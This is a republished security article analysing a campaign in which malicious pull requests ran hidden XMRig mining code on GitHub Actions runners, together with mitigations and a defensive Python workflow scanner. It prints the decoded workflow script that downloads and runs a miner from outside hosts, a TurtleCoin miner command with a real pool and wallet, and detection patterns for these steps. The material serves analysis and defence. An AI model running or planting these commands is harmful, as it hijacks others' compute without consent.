How Hackers Hijack GitHub Actions to Run Free Crypto Mining

Amid soaring cryptocurrency prices, attackers are abusing GitHub Actions by submitting malicious pull requests that run hidden XMRig mining code on GitHub’s free CI runners. This article follows a French developer’s investigation, walks through the decoded code, estimates the scale of the campaign, and offers mitigation advice.

ITPUB

Suspicious Pull Requests Trigger Investigation

A French developer, Tib, noticed an unusual surge of pull requests (PRs) from a single GitHub user (y4ndexhater1) on a low‑star, seemingly abandoned repository. Within 14 hours he received seven PRs, all lacking descriptions, prompting him to examine the repository.

The repository contained a chaotic README with examples of Perl projects, GitHub Actions, CircleCI, and Travis CI configurations. Despite its obscurity, the repo was forked twice in three days, raising suspicion.

Running the Malicious Workflow

Tib discovered that the attacker had added a .github/workflows/ci.yml file. The workflow executed a base64‑encoded command that, when decoded, performed the following steps:

apt update -qq
apt install -y curl git jq
curl -Lfo prog https://github.com/bhriscarnatt/first-repo/releases/download/a/prog || curl -Lfo prog https://transfer.sh/OSPjK/prog
ip=$(curl -s -H 'accept: application/dns-json' 'https://dns.google/resolve?name=poolio.magratmail.xyz&type=A' | jq -r '.Answer[0].data')
chmod u+x prog
timeout 4h ./prog -o "${ip}:3000" -u ChrisBarnatt -p ExplainingComputers --cpu-priority 5 > /dev/null

The script installs basic tools, downloads a binary named prog, resolves a DNS name to obtain an IP address, makes the binary executable, and runs it with specific arguments.

Running objdump -s --section .comment prog revealed that the binary is built with GCC 10.2.1 on Alpine Linux. Executing ./prog --version showed:

$ ./prog --version
XMRig 6.8.1
 built on Feb 3 2021 with GCC 10.2.1
 features: 64-bit AES

libuv/1.40.0
OpenSSL/1.1.1i
hwloc/2.4.0

The binary is the popular Monero miner XMRig (version 6.8.1), though SHA‑256 verification suggested it might be a modified build.

Why This Attack Works

GitHub Actions automatically executes workflows defined in .github/workflows/*.yml when a PR that triggers them is opened. If a repository lets PR‑triggered workflows run without review, a malicious actor can run arbitrary code on GitHub’s free CI runners without the repository owner’s explicit approval.

The attack chain is:

1. Create a legitimate‑looking repository.
2. Add a malicious GitHub Action that downloads and runs a miner.
3. Submit a PR to a target repository that has a workflow configured to run on PR events.
4. When the PR is merged (or even just opened, depending on the workflow), the runner executes the hidden mining code.

Because the runner runs on GitHub’s infrastructure, the attacker gains free compute resources. Aqua Security estimates that in a three‑day window the campaign generated over 23,300 commits on GitHub, 58,000 builds on Docker Hub, and roughly 30,000 mining tasks, consuming significant CPU cycles.

Mitigation Strategies

To reduce risk, projects should:

1. Disable automatic workflow runs on PR events, or restrict them to trusted actions only (e.g., official GitHub actions or actions from verified authors).
2. Restrict the repository’s Actions permissions so that only locally defined actions, or actions from approved sources, are allowed to run.
3. Report malicious accounts to GitHub for suspension and close the offending PRs.

Even with these measures, attackers can simply create new accounts, making complete eradication difficult.

The Campaign Continues on Other Platforms

Recent variants upload the miner to GitLab and disguise it as an npm package: a suspicious nani.bat file runs a binary named npm.exe with the following command, which mines TurtleCoin (a CPU‑friendly cryptocurrency):

npm.exe --algorithm argon2id_chukwa2 \
--pool turtlecoin.herominers.com:10380 \
--wallet TRTLv3ZvhUDDzXp9RGSVKXcMvrPyV5yCpHxkDN2JRErv43xyNe5bHBaFHUogYVc58H1Td7vodta2fa43Au59Bp9qMNVrfaNwjWP \
--password xo

GitHub’s free runners provide roughly two Intel E5‑2673v4 cores and 7 GB RAM. A single runner can earn only a few cents per day, and most mining jobs are terminated within a few hours due to build‑time limits on platforms like Docker Hub.

Broader Security Implications

Beyond mining, the same vulnerability can allow attackers to read and write repository contents, and even exfiltrate encrypted secrets. Google Project Zero reported this issue to GitHub in July 2022, but remediation has been slow.

Recommendations: avoid using untrusted marketplace actions, never expose secret keys to public workflows, and monitor CI logs for unexpected network calls or binary downloads.
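As an added example (written for this page, not code from the original article or the campaign), the scanner below applies the patterns described above to workflow text: it decodes any base64 stage piped into a shell, then flags the fetch, chmod and run sequence, the DNS‑over‑HTTPS pool lookup, and miner‑style flags of the kind seen in the ci.yml and nani.bat commands. The sample workflows, hostnames and wallet values are constructed placeholders.

```python
import base64
import re

# Rules modelled on the two variants this article describes: a base64-decoded
# shell stage that fetches, chmods and runs a binary (with a DNS-over-HTTPS
# lookup for the pool address), and a renamed miner given pool/wallet flags.
RULES = [
    ("decode_and_exec", re.compile(r"base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh\b")),
    ("fetch_to_file", re.compile(r"\b(?:curl|wget)\b[^\n]*\s-[A-Za-z]*[oO]\s*\S+")),
    ("make_executable", re.compile(r"\bchmod\s+(?:[ugoa]*\+x|[0-7]{3,4})\b")),
    ("doh_lookup", re.compile(r"dns\.google/resolve\?")),
    ("miner_flags", re.compile(r"--cpu-priority|--algorithm|--pool\b|--wallet\b|-o\s+\S+:\d{2,5}\b")),
]
DECODE_STAGE = re.compile(r"echo\s+['\"]?([A-Za-z0-9+/=]{40,})['\"]?\s*\|\s*base64\s+(?:-d|--decode)")


def decode_payloads(text):
    """Decode every base64 blob that is echoed into base64 -d; skip ones that fail."""
    decoded = []
    for blob in DECODE_STAGE.findall(text):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            pass
    return decoded


def scan_workflow(text):
    """Return the sorted names of rules that fire on the text or on any decoded stage."""
    hits = set()
    for stage in [text] + decode_payloads(text):
        hits.update(name for name, rx in RULES if rx.search(stage))
    return sorted(hits)


# Constructed samples (not the campaign's real hosts or wallets) in the shape of
# the ci.yml and nani.bat commands quoted in the article.
INNER_SCRIPT = """curl -Lfo prog https://mirror.example.invalid/prog
ip=$(curl -s -H 'accept: application/dns-json' 'https://dns.google/resolve?name=pool.example.invalid&type=A' | jq -r '.Answer[0].data')
chmod u+x prog
timeout 4h ./prog -o "${ip}:3000" -u WALLET_PLACEHOLDER --cpu-priority 5 > /dev/null
"""
SUSPICIOUS_WORKFLOW = "on: pull_request\njobs:\n  ci:\n    runs-on: ubuntu-latest\n    steps:\n      - run: echo %s | base64 -d | bash\n" % base64.b64encode(INNER_SCRIPT.encode()).decode()
BENIGN_WORKFLOW = "on: pull_request\njobs:\n  test:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions/checkout@v4\n      - run: make test\n"
RENAMED_MINER = "npm.exe --algorithm argon2id_chukwa2 --pool pool.example.invalid:10380 --wallet WALLET_PLACEHOLDER --password xo"

if __name__ == "__main__":
    for label, sample in [("suspicious", SUSPICIOUS_WORKFLOW), ("benign", BENIGN_WORKFLOW), ("renamed miner", RENAMED_MINER)]:
        print(label, "->", scan_workflow(sample) or "clean")
```

Run it over the `run:` steps of incoming workflow changes or over captured CI logs; a hit on `decode_and_exec` together with `fetch_to_file` and `make_executable` is the shape of the attack this article describes.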

References:

https://therecord.media/github-investigating-crypto-mining-campaign-abusing-its-server-infrastructure/

https://dev.to/thibaultduponchelle/the-github-action-mining-attack-through-pull-request-2lmc

https://blog.aquasec.com/container-security-alert-campaign-abusing-github-dockerhub-travis-ci-circle-ci

https://bugs.chromium.org/p/project-zero/issues/detail?id=2070

Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact admin@besthub.dev and we will review it promptly.